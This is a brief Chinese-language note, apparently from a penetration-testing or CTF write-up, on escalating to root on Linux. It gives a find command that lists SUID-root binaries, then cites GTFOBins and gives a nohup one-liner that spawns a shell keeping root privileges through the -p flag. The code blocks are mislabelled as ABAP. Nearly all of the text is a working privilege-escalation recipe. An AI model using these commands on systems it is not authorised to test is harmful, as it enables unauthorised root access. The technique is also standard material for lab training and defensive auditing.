(1)find查找拥有suid(root)权限。
♾️ abap 代码:find / -perm -u=s -type f 2>/dev/null
(2)尝试
nohup
命令,使用: https://gtfobins.github.io/gtfobins/nohup/ -p是用root的权限运行sh.
-c 是执行命令
<$(tty) >$(tty) 2>$(tty)是终端输入2是标准输出♾️ abap 代码:
nohup /bin/sh -p -c "sh -p <$(tty) >$(tty) 2>$(tty)"